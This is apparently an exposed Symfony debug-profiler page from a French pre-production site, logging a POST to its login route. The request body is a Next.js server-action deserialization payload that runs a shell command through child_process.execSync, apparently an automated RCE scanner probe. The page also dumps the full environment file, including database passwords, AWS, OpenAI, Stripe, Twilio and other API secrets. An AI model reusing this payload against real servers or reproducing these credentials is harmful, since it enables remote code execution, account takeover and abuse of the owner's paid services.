Redirect 302 redirect from GET @app_homepage (1003cd)

POST https://midasglass.preprod.reseauglass.fr/login

Request / Response

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}"
1
""$@0""
2
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_access_control_attributes
null
_controller
"App\Controller\SecurityController::login"
_firewall_context
"security.firewall.map.context.main"
_redirected
true
_route
"app_login"
_route_params
[]
_security_firewall_run
"_security_main"
_security_remember_me_cookie
Symfony\Component\HttpFoundation\Cookie {#1444
  #expire: 1
  #path: "/"
  -sameSite: "none"
  -secureDefault: false
  #name: "REMEMBERME"
  #value: null
  #domain: null
  #secure: true
  #httpOnly: true
  -raw: false
  -partitioned: false
}
_stopwatch_token
"1f1cfe"

Request Headers

Header Value
accept
"*/*"
accept-encoding
"gzip, deflate"
connection
"keep-alive"
content-length
"753"
content-type
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
cookie
"PHPSESSID=35d9dba819164d739fe6b34ac16cb41b; main_deauth_profile_token=1003cd; sf_redirect=%7B%22token%22%3A%221003cd%22%2C%22route%22%3A%22app_homepage%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CHomepageController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Freseauglass%5C%2Fpreprod%5C%2Fsrc%5C%2FController%5C%2FHomepageController.php%22%2C%22line%22%3A32%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
host
"midasglass.preprod.reseauglass.fr"
next-action
"x"
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
x-nextjs-html-request-id
"SSTMXm7OJ_g0Ncx6jpQt9"
x-nextjs-request-id
"b5dce965"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=utf-8"
date
"Fri, 12 Dec 2025 00:52:52 GMT"
location
"/login"
set-cookie
"REMEMBERME=deleted; expires=Thu, 12 Dec 2024 00:52:51 GMT; Max-Age=0; path=/; secure; httponly; samesite=none"
x-debug-token
"b10a79"

Cookies

Request Cookies

Key Value
PHPSESSID
"35d9dba819164d739fe6b34ac16cb41b"
main_deauth_profile_token
"1003cd"
sf_redirect
"{"token":"1003cd","route":"app_homepage","method":"GET","controller":{"class":"App\\Controller\\HomepageController","method":"index","file":"\/home\/reseauglass\/preprod\/src\/Controller\/HomepageController.php","line":32},"status_code":302,"status_text":"Found"}"

Response Cookies

Key Value
REMEMBERME
Symfony\Component\HttpFoundation\Cookie {#1444
  #expire: 1
  #path: "/"
  -sameSite: "none"
  -secureDefault: false
  #name: "REMEMBERME"
  #value: null
  #domain: null
  #secure: true
  #httpOnly: true
  -raw: false
  -partitioned: false
}

Session 2

Session Metadata

Key Value
Created
"Fri, 12 Dec 25 00:52:52 +0000"
Last used
"Fri, 12 Dec 25 00:52:52 +0000"
Lifetime
2629800

Session Attributes

Attribute Value
_security.last_error
Symfony\Component\Security\Core\Exception\BadCredentialsException {#1396
  #message: "Bad credentials."
  #code: 0
  #file: "/home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
  #line: 265
  -previous: Symfony\Component\Security\Core\Exception\UserNotFoundException {#1385 …}
  -token: null
  trace: {
    /home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:265 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->handleAuthenticationFailure(AuthenticationException $authenticationException, Request $request, AuthenticatorInterface $authenticator, ?Passport $passport): Response …
      › if ($this->isSensitiveException($authenticationException)) {    $authenticationException = new BadCredentialsException('Bad credentials.', 0, $authenticationException);}
    }
    /home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:221 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticator(AuthenticatorInterface $authenticator, Request $request): Response …
      › // oh no! Authentication failed!$response = $this->handleAuthenticationFailure($e, $request, $authenticator, $passport);if ($response instanceof Response) {
    }
    /home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:167 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->executeAuthenticators(array $authenticators, Request $request): Response …
      › 
      › $response = $this->executeAuthenticator($authenticator, $request);if (null !== $response) {
    }
    /home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php:149 {
      Symfony\Component\Security\Http\Authentication\AuthenticatorManager->authenticateRequest(Request $request): Response …
      › 
      ›     return $this->executeAuthenticators($authenticators, $request);}
    }
    /home/reseauglass/preprod/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php:38 {
      Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › $request = $event->getRequest();$response = $this->authenticatorManager->authenticateRequest($request);if (null === $response) {
    }
    /home/reseauglass/preprod/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php:58 {
      Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener->authenticate(RequestEvent $event): void …
      › {    $this->authenticationManagerListener->authenticate($event);}
    }
    /home/reseauglass/preprod/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php:46 {
      Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener->authenticate(RequestEvent $event): void …
      › try {    $this->listener->authenticate($event);} catch (LazyResponseException $e) {
    }
    /home/reseauglass/preprod/vendor/symfony/security-bundle/Security/LazyFirewallContext.php:70 {
      Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext->authenticate(RequestEvent $event): void …
      › foreach ($listeners as $listener) {    $listener($event);}
    /home/reseauglass/preprod/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php:94 {
      Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener->callListeners(RequestEvent $event, iterable $listeners): void …
      › } elseif (false !== $listener->supports($event->getRequest())) {    $listener->authenticate($event);}
    }
    /home/reseauglass/preprod/vendor/symfony/security-http/Firewall.php:93 {
      Symfony\Component\Security\Http\Firewall->onKernelRequest(RequestEvent $event) …
      › 
      ›     $this->callListeners($event, $authenticationListeners());}
    }
    /home/reseauglass/preprod/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:115 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
    }
    /home/reseauglass/preprod/vendor/symfony/event-dispatcher/EventDispatcher.php:206 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event): void …
      ›     }    $listener($event, $eventName, $this);}
    }
    /home/reseauglass/preprod/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /home/reseauglass/preprod/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:126 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, ?string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /home/reseauglass/preprod/vendor/symfony/http-kernel/HttpKernel.php:159 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /home/reseauglass/preprod/vendor/symfony/http-kernel/HttpKernel.php:76 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {
    }
    /home/reseauglass/preprod/vendor/symfony/http-kernel/Kernel.php:193 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /home/reseauglass/preprod/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);}
    /home/reseauglass/preprod/vendor/autoload_runtime.php:32 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /home/reseauglass/preprod/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/home/reseauglass/preprod/vendor/autoload_runtime.php"
      }
    }
  }
}
_security.main.target_path
"https://midasglass.preprod.reseauglass.fr/"

Session Usage

2 Usages
Stateless check enabled
Usage
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:39
[
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-core/Authentication/Token/Storage/UsageTrackingTokenStorage.php"
    "line" => 39
    "function" => "getMetadataBag"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 181
    "function" => "getToken"
    "class" => "Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 167
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 149
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 38
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 58
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 70
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 94
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Firewall.php"
    "line" => 93
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 126
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 159
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/http-kernel/Kernel.php"
    "line" => 193
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/autoload_runtime.php"
    "line" => 32
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/public/index.php"
    "line" => 5
    "args" => [
      "/home/reseauglass/preprod/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]
Symfony\Component\Security\Http\Authenticator\AbstractLoginFormAuthenticator:51
[
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authenticator/AbstractLoginFormAuthenticator.php"
    "line" => 51
    "function" => "set"
    "class" => "Symfony\Component\HttpFoundation\Session\Session"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticator.php"
    "line" => 102
    "function" => "onAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authenticator\AbstractLoginFormAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 268
    "function" => "onAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticator"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 221
    "function" => "handleAuthenticationFailure"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 167
    "function" => "executeAuthenticator"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authentication/AuthenticatorManager.php"
    "line" => 149
    "function" => "executeAuthenticators"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Firewall/AuthenticatorManagerListener.php"
    "line" => 38
    "function" => "authenticateRequest"
    "class" => "Symfony\Component\Security\Http\Authentication\AuthenticatorManager"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Authenticator/Debug/TraceableAuthenticatorManagerListener.php"
    "line" => 58
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Firewall\AuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-bundle/Debug/WrappedLazyListener.php"
    "line" => 46
    "function" => "authenticate"
    "class" => "Symfony\Component\Security\Http\Authenticator\Debug\TraceableAuthenticatorManagerListener"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-bundle/Security/LazyFirewallContext.php"
    "line" => 70
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\WrappedLazyListener"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-bundle/Debug/TraceableFirewallListener.php"
    "line" => 94
    "function" => "authenticate"
    "class" => "Symfony\Bundle\SecurityBundle\Security\LazyFirewallContext"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/security-http/Firewall.php"
    "line" => 93
    "function" => "callListeners"
    "class" => "Symfony\Bundle\SecurityBundle\Debug\TraceableFirewallListener"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/event-dispatcher/Debug/WrappedListener.php"
    "line" => 115
    "function" => "onKernelRequest"
    "class" => "Symfony\Component\Security\Http\Firewall"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 206
    "function" => "__invoke"
    "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/event-dispatcher/EventDispatcher.php"
    "line" => 56
    "function" => "callListeners"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php"
    "line" => 126
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\EventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 159
    "function" => "dispatch"
    "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/http-kernel/HttpKernel.php"
    "line" => 76
    "function" => "handleRaw"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/http-kernel/Kernel.php"
    "line" => 193
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\HttpKernel"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php"
    "line" => 35
    "function" => "handle"
    "class" => "Symfony\Component\HttpKernel\Kernel"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/vendor/autoload_runtime.php"
    "line" => 32
    "function" => "run"
    "class" => "Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner"
    "type" => "->"
  ]
  [
    "file" => "/home/reseauglass/preprod/public/index.php"
    "line" => 5
    "args" => [
      "/home/reseauglass/preprod/vendor/autoload_runtime.php"
    ]
    "function" => "require_once"
  ]
]

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_PRICE
"29.90"
APP_SECRET
"a20841d033f6862333182aa90f96b6d6"
ASSET_BASE_URL
""
BRIDGE_API_CALLS_ENABLED
"true"
BRIDGE_API_CLIENT_ID
"6d77d011996448459524d241638c34ec"
BRIDGE_API_CLIENT_SECRET
"Xmb70AEZIkzj50UwsPuvHLuVQMldxQ9gbXMbonirYqJHfudEhbFVCiWPBmexaTQo"
BRIDGE_API_SANDBOX_MODE
"true"
BRIDGE_API_URI
"https://api.bridgeapi.io/v3/"
BRIDGE_ENABLED
"true"
BRIDGE_WEBHOOK_ACCOUNT_CREATED_SECRET
"da1b923d-aefb-4a10-9909-edbf6de33935"
BRIDGE_WEBHOOK_ACCOUNT_UPDATED_SECRET
"395cc3dc-130f-41bd-8c9a-043ebd2d9f08"
BRIDGE_WEBHOOK_ITEM_CREATED_SECRET
"312dc490-c52c-495c-94d5-6329508708fa"
BRIDGE_WEBHOOK_ITEM_REFRESHED_SECRET
"38c0740d-481b-4c46-9ef5-68ba5a128825"
BRIDGE_WEBHOOK_TRUSTED_IPS
"63.32.31.5,52.215.247.62,34.249.92.209"
CLEARBUS_API_LOGIN
"api_access_preprod"
CLEARBUS_API_PASSWORD
"T@nger$2024!!"
CLEARBUS_API_URL
"https://clearbus-preprod-7yppf3luxq-od.a.run.app/"
CLEARBUS_COURIERS
"%kernel.project_dir%/clearbus/couriers"
CLEARBUS_ENABLED
"true"
CLEARBUS_ID
"192OL39"
CLEARBUS_OUTPUTS
"%kernel.project_dir%/clearbus/outputs"
CLEARBUS_PASSWORD
"Clearbus1"
CLEARBUS_SERVICE_CALL_ENABLED
"true"
CLEARBUS_TOTP_KEY
"HAFQEIRKAYEDC==="
CLEARBUS_TRACE_ENABLED
"true"
CORS_ALLOW_ORIGIN
"^https?://(localhost|127\.0\.0\.1)(:[0-9]+)?$"
DATABASE_URL
"postgresql://reso:T@nger2022!@127.0.0.1:54320/resoglass_preprod_2?serverVersion=13&charset=utf8"
ENABLE_MERCURE_PUSH
"true"
ENABLE_MERCURE_SUBSCRIBING
"false"
GOOGLE_API_KEY
"AIzaSyAHN7qqrzpzHDBT61e9XaH_BIFV8IOBeFw"
GOOGLE_APPLICATION_CREDENTIALS
"service-account-global.json"
GOOGLE_MAIL_CREDENTIALS
"service-account-gmail.json"
GOOGLE_RECAPTCHA
"6LcinowqAAAAAK6kgrPr8N4URJNsfs21DOIe_Qf8"
GOOGLE_USE_BUCKET
"false"
JWT_PASSPHRASE
"8d669c53591c9e5786316ec60e4e88afdd6cd71b08f9dc64f6772bd4787b687d"
JWT_PUBLIC_KEY
"%kernel.project_dir%/config/jwt/public.pem"
JWT_SECRET_KEY
"%kernel.project_dir%/config/jwt/private.pem"
LOCK_DSN
"semaphore"
MAILER_DSN
"smtp://localhost:1025"
MERCURE_JWT_SECRET
"""
-----BEGIN PUBLIC KEY-----\n
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAx8q6oLqK4S4o1K4PBglq\n
J+R+VPs9/tRdHSwEJCZW4sY9dKEE5m/GB2OCafKtN7hqDA6FRpKItsfjlTpke3BR\n
isk7TBusCJa5HImj49uroInUZlLuc1VVb+A0fieGdE4i8jcKajyFv95fdFTdJlZU\n
WC3P86X1JiM7JFHcg6Owo2GbUUAS19/CGt9nGHEWJ3ucScd1HK3g8Gw6g/Q7k7yt\n
kHrokDs/ipA6FokJdaEWh6UXBRm7jNYKVlUgWomHclHclJLgWQCg7N4OuMnUfb4V\n
afZwkfG0fDympwf/2GnDGF3sGDwojoGwNTb3xBWfc82m+TQEDI2KPxcmASB4Vohh\n
KQIDAQAB\n
------END PUBLIC KEY-----
"""
MERCURE_PUBLIC_URL
"https://preprod.reseauglass.fr/hub/.well-known/mercure"
MERCURE_PUBLISHER_JWT_ALG
"RS256"
MERCURE_PUBLISH_URL
"https://preprod.reseauglass.fr/hub/.well-known/mercure"
MERCURE_SUBSCRIBER_JWT_ALG
"RS256"
MERCURE_TRANSPORT_URL
"local://local"
MERCURE_URL
"https://preprod.reseauglass.fr/hub/.well-known/mercure"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=0"
NEXT_PUBLIC_API_URL
"https://preprod.reseauglass.fr"
OPENAI_API_KEY
"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"
OPENAI_MODEL
"gpt-4o-mini"
OUTLOOK_CLIENT_ID
"095e18a4-34e7-4cb4-9786-44c3cc95748f"
OUTLOOK_CLIENT_SECRET
"92fbd183-3191-46fd-bc11-b68a46c0cfd1"
OUTLOOK_CLIENT_VALUE
"Ub_8Q~_XH0dQYTB3yAz9Bv1L3uAE9CJXpegzRdqK"
RAPIDAPI_HOST
"app.auto-ways.net/api/v1/fr"
RAPIDAPI_KEY
"pk_cedeab00848f3170fc1a8d1db4a68e38"
RINGOVER_API_KEY_ADEL
""
RINGOVER_API_KEY_HELLOGLASS
""
RINGOVER_API_KEY_RESEAUGLASS
""
SES_AWS_ACCESS_KEY_ID
"AKIA2P6SJS7NQJI2PB77"
SES_AWS_SECRET_ACCESS_KEY
"BO2vwfHrn/ceTrScNskU/vun9PQZvXtBWhJMZBiKaGdG"
SIDEXA_AGREMENT
"01-D6-0100-999999-999-23"
SIDEXA_FEATURE_ENABLED
"true"
SIDEXA_GATEWAY_ENABLED
"true"
SIDEXA_ITR_ID
"FR917538944000137R"
SIDEXA_LOGIN
"sys"
SIDEXA_MIRROR_ENABLED
"true"
SIDEXA_PASSWD
"ea6f475930c26ed5d0511153f00a5152"
SIDEXA_REST_API
"https://wsrec.sidexa.com/wuarec/rest"
SIRENE_API_KEY
"39d31b0e-8920-41fe-931b-0e8920c1fe7f"
SIRENE_API_URI
"https://api.insee.fr/api-sirene/3.11/"
SIRENE_JETON_TOKEN
"57fe7ca0-f510-31c4-80a4-e5cf20da952f"
SIRENE_KEY_CONSUME
"p4yMCzK2gKAvvqCaIWj_aPYpOo8a"
SIRENE_KEY_SECRET
"MwuBSVGW2mMw5WlRoLMKFDu3Lv4a"
STRIPE_API_KEY
"sk_test_51LcoraKwIGxBSM3PX5u1UcaceAoFwNialJeJzxgVh0K0SS59NsgMenpGa2XjRtHqQINnxWpzMtZIRgV3kLSpGfEG00lMkRTJO7"
STRIPE_ENDPOINT_SECRET
"whsec_BVuWWydXqWZwIWdKk13876ds0PconVeo"
STRIPE_ID_TAXE
"txr_1LhX0iKwIGxBSM3PcPXKcLrJ"
TWILIO_ACCOUNT_SID
"ACc2df51d9359eacdeffe8d42fc922e858"
TWILIO_AUTH_TOKEN
"dfec4cc2a4c8d6670af79386ef18c45d"
TWILIO_DSN
"twilio://ACc2df51d9359eacdeffe8d42fc922e858:dfec4cc2a4c8d6670af79386ef18c45d@default?from=+12565884431"
TWILIO_SMS_FEATURE_ENABLED
"true"
TWILIO_SMS_FROM
"+12565884431"
TWILIO_WHATSAPP_DSN
"twilio://ACc2df51d9359eacdeffe8d42fc922e858:dfec4cc2a4c8d6670af79386ef18c45d@default?from=whatsapp:+14155238886"
TWILIO_WHATSAPP_FEATURE_ENABLED
"false"
TWILIO_WHATSAPP_FROM
"+14155238886"
YOUSIGN_API_URI
"https://api-sandbox.yousign.app/v3/"
YOUSIGN_API_V3_TOKEN
"ZrRANSBvG1Heiozr8zQAayMqG86Qpf98"
YOUSIGN_PRODUCTION
"0"
YOUSIGN_TOKEN
"fb7ecebed7979cbd095b35410a476a35"
YOUSIGN_URL_SIGN
"https://staging-app.yousign.com/procedure/sign?members="
YOUSIGN_WEBHOOK
"https://preprod.reseauglass.fr/sign"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
APP_PROJECT_DIR
"/home/reseauglass/preprod"
APP_RUNTIME
"Symfony\Component\Runtime\SymfonyRuntime"
APP_RUNTIME_OPTIONS
[
  "project_dir" => "/home/reseauglass/preprod"
]
CONTENT_LENGTH
"753"
CONTENT_TYPE
"multipart/form-data; boundary=--------WebKitFormBoundaryx8jO2oVc6SWP3Sad"
CONTEXT_DOCUMENT_ROOT
"/home/reseauglass/preprod/public"
CONTEXT_PREFIX
""
DOCUMENT_ROOT
"/home/reseauglass/preprod/public"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/www"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_ACCEPT_ENCODING
"gzip, deflate"
HTTP_CONNECTION
"keep-alive"
HTTP_COOKIE
"PHPSESSID=35d9dba819164d739fe6b34ac16cb41b; main_deauth_profile_token=1003cd; sf_redirect=%7B%22token%22%3A%221003cd%22%2C%22route%22%3A%22app_homepage%22%2C%22method%22%3A%22GET%22%2C%22controller%22%3A%7B%22class%22%3A%22App%5C%5CController%5C%5CHomepageController%22%2C%22method%22%3A%22index%22%2C%22file%22%3A%22%5C%2Fhome%5C%2Freseauglass%5C%2Fpreprod%5C%2Fsrc%5C%2FController%5C%2FHomepageController.php%22%2C%22line%22%3A32%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D"
HTTP_HOST
"midasglass.preprod.reseauglass.fr"
HTTP_NEXT_ACTION
"x"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0"
HTTP_X_NEXTJS_HTML_REQUEST_ID
"SSTMXm7OJ_g0Ncx6jpQt9"
HTTP_X_NEXTJS_REQUEST_ID
"b5dce965"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
PHP_SELF
"/index.php"
QUERY_STRING
""
REMOTE_ADDR
"3.96.33.78"
REMOTE_PORT
"34082"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1765500772
REQUEST_TIME_FLOAT
1765500772.3379
REQUEST_URI
"/login"
SCRIPT_FILENAME
"/home/reseauglass/preprod/public/index.php"
SCRIPT_NAME
"/index.php"
SCRIPT_URI
"https://midasglass.preprod.reseauglass.fr/login"
SCRIPT_URL
"/login"
SERVER_ADDR
"5.39.68.126"
